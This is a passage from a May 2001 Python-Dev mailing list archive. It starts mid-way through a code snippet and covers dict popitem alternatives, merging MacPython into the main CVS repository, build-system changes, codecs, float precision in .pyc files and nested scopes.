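        return "Y.a"


class Z:
    def a(self):
        return "Z.a"


class X(Y, Z):
    b = Y.a  # the suggested equivalent: alias Y.a as b...


class XRenamed(Y, Z):
    b = Y.a
    a = Z.a  # ...but hiding Y.a behind Z.a requires saying so explicitly


print(X().b(), X().a())                # Y.a Y.a
print(XRenamed().b(), XRenamed().a())  # Y.a Z.a
```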


From Greg.Wilson at baltimore.com  Sun May  6 18:26:00 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400 
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one at home.com  Sun May  6 20:15:57 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).
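For the "random" reading, the simplest uniform choice from Python code materializes the entries, which makes the expense concrete: every call is O(len(d)). A sketch using the standard random module; random_item is a hypothetical helper name:

```python
import random


def random_item(d, rng=random):
    """Return a uniformly random (key, value) pair from d without mutating it."""
    if not d:
        raise KeyError("random_item passed an empty dict")
    # Building the list costs O(len(d)) time and memory on every call,
    # unlike popitem()'s cheap arbitrary pick.
    return rng.choice(list(d.items()))


print(random_item({"k": 0}))  # ('k', 0)
```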

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")
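In Python 3, dict.iteritems() no longer exists, so the second arb() would be spelled with next(iter(d.items())). Since Python 3.7 dicts preserve insertion order, so this returns the first-inserted entry; callers should still treat the result as arbitrary in the sense above:

```python
def arb(d):
    """Return an arbitrary (key, value) pair from d without mutating it."""
    if d:
        # items() views are iterable; next() takes the first pair they yield.
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


print(arb({"x": 1, "y": 2}))  # ('x', 1)
```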

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set
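As a concrete instance of that worklist pattern, here is a hypothetical reachability computation in Python 3, where process(x) becomes "queue the not-yet-seen neighbours of x" (a plain set with set.pop() would serve equally well today):

```python
def reachable(graph, start):
    """Nodes reachable from start, using the popitem() worklist idiom."""
    seen = {start}
    working_set = {start: None}  # dict used as a set; values are ignored
    while working_set:
        x, dontcare = working_set.popitem()
        # "process(x)": may add more elements to working_set
        for y in graph.get(x, ()):
            if y not in seen:
                seen.add(y)
                working_set[y] = None
    return seen


graph = {1: [2, 3], 2: [4], 3: [4], 4: [1], 5: [1]}
print(sorted(reachable(graph, 1)))  # [1, 2, 3, 4]
```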


From jack at oratrix.nl  Mon May  7 11:39:43 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There's two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the filenamespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:45:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
of Python does not allow for an easy addition of a platform-dependent 
sourcefile to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform-dependent source file has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:49:17 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) would have a search path for module sourcefiles. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules) not having 
a search path means I get ugly "../Mac/Modules/foomodule.c" constructs.

I have the code for setup.py ready, is it OK if I check it in?
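The actual setup.py change is not shown here, so the following is only a hypothetical sketch of the idea: try each directory on a search path in turn and return the first match, so a module definition can name "foomodule.c" instead of "../Mac/Modules/foomodule.c". The function name and directory layout are assumptions:

```python
import os


def find_module_source(filename, search_dirs):
    """Return the first existing path for filename in search_dirs, else None."""
    for directory in search_dirs:
        candidate = os.path.join(directory, filename)
        if os.path.isfile(candidate):
            return candidate
    return None


# Hypothetical usage: look in the generic tree first, then the Mac tree.
print(find_module_source("foomodule.c", ["Modules", os.path.join("Mac", "Modules")]))
```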
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From loewis at informatik.hu-berlin.de  Mon May  7 11:53:54 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There's two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido at digicool.com  Mon May  7 16:00:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
             <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There's two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Mon May  7 15:04:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There's two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas at python.ca  Mon May  7 15:14:52 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, it's still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform-dependent source file has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
substitution?

  Neil


From jack at oratrix.nl  Mon May  7 15:17:18 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
	     Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> 
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem, I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.


From jack at oratrix.nl  Mon May  7 15:27:14 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core 
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
	     Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> 
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> substitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.


From nas at python.ca  Mon May  7 15:30:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal at lemburg.com  Mon May  7 20:44:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
	            <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simple examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time comes
along.
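These transforms did end up in the standard library, but not behind str.decode() as discussed here. In current Python 3 they are applied with codecs.encode() and codecs.decode(). rot13 is a str-to-str transform. base64, quoted-printable and hex are bytes-to-bytes transforms. binhex and uuencode are left out of this sketch. A short illustration, assuming Python 3.4 or later:

```python
import base64
import binascii
import codecs

text = "Hello, Python-Dev"
data = b"\x00\x01binary\xff"

# rot13: a str -> str transform
rot = codecs.encode(text, "rot13")

# bytes -> bytes transforms for some of the file encodings listed above
b64 = codecs.encode(data, "base64")   # same output as base64.encodebytes(data)
qp = codecs.encode(data, "quopri")    # quoted-printable
hexed = codecs.encode(data, "hex")    # same output as binascii.hexlify(data)

# Every transform is undone by codecs.decode() with the same codec name.
for encoded, name, original in [(rot, "rot13", text),
                                (b64, "base64", data),
                                (qp, "quopri", data),
                                (hexed, "hex", data)]:
    assert codecs.decode(encoded, name) == original
```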

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin at loewis.home.cs.tu-berlin.de  Mon May  7 23:21:27 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows you to merge parts of the tree into a single
sandbox. E.g. you could do

macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which
also contains a Mac directory (where Mac is another module: either a
top-level directory next to python/ in the repository, or an entry in
CVSROOT/modules).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules as similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one at home.com  Tue May  8 06:14:22 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
With the patch applied, the fix counts as working only if test_import
passes both after first deleting all .pyc/.pyo files and when run a
second time without deleting them.

Works on Win98SE, but you may have already guessed that <wink>.
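The message does not say where the precision was lost. The example below only illustrates the general hazard. It assumes a float constant passes through a decimal string somewhere on its way into the .pyc. With 12 significant digits, that string cannot always recover the original IEEE-754 double, but 17 always can. The example then checks the property the test case cares about: a float constant survives a marshal dump and load, as it would when written to and read back from a .pyc file. This uses current Python 3, not the 2001 code:

```python
import marshal

x = 0.1 + 0.2          # the double printed as 0.30000000000000004

# Too few significant digits: the decimal text maps back to a different double.
short = float("%.12g" % x)       # "%.12g" gives "0.3"
# 17 significant digits always identify an IEEE-754 double exactly.
full = float("%.17g" % x)

# A .pyc holds a marshalled code object. Compile a module whose constant is x,
# push the code object through marshal, run it, and compare the constant.
code = compile("y = %r" % x, "<demo>", "exec")
namespace = {}
exec(marshal.loads(marshal.dumps(code)), namespace)
```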


From tim.one at home.com  Tue May  8 06:52:37 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes be made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
having trouble sleeping tonight <wink>.


From thomas at xs4all.net  Tue May  8 12:14:20 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas at per.dem.csiro.au  Tue May  8 12:34:37 2001
From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800 
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h -
needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas at xs4all.net  Tue May  8 13:36:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.
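In current Python 3 the spelling has changed. iteritems() became items(), and an iterator's next method is now __next__, normally called through the next() builtin. A sketch of both variants in that spelling:

```python
def arb(d):
    """Tim's arb(): an arbitrary (key, value) pair, without mutating d."""
    if d:
        # A fresh iterator on every call, so an unchanged dict gives the
        # same pair each time.
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


d = {"a": 1, "b": 2, "c": 3}

# Thomas's variant: one live iterator whose bound __next__ is called
# repeatedly, so each call yields the next pair.
arb_next = iter(d.items()).__next__

same = (arb(d), arb(d))
successive = (arb_next(), arb_next())
```

The first keeps returning the same pair; the second walks through the dict.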



From thomas at xs4all.net  Tue May  8 14:10:00 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependent #ifdefs and differently-defined
macros we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.



From thomas at xs4all.net  Tue May  8 14:13:39 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)



From guido at digicool.com  Tue May  8 15:35:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
             <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May  8 15:41:42 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
             <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Tue May  8 16:05:01 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?
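For reference, each _Feature record in Lib/__future__.py can be queried at run time. getOptionalRelease() gives the first release that accepts the future statement. getMandatoryRelease() gives the release where the feature is always on. Both return sys.version_info-style tuples. In current Python 3 the nested_scopes record holds exactly the pair Neil proposes. A small check, assuming Python 3:

```python
import __future__
import sys

feature = __future__.nested_scopes

# First release in which "from __future__ import nested_scopes" is accepted.
optional = feature.getOptionalRelease()
# Release from which nested scopes are on with or without the future statement.
mandatory = feature.getMandatoryRelease()

print("optional from", optional)
print("mandatory from", mandatory)
# sys.version_info compares like a tuple, so this tells whether the running
# interpreter enables the feature unconditionally.
print("always on here:", sys.version_info >= mandatory)
```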

  Neil


From jack at oratrix.nl  Tue May  8 16:07:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> 
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.


From mwh at python.net  Tue May  8 16:41:45 2001
